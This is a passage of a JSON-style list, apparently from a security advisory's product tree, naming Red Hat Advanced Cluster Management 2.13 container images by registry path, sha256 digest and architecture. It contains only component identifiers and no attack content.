"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
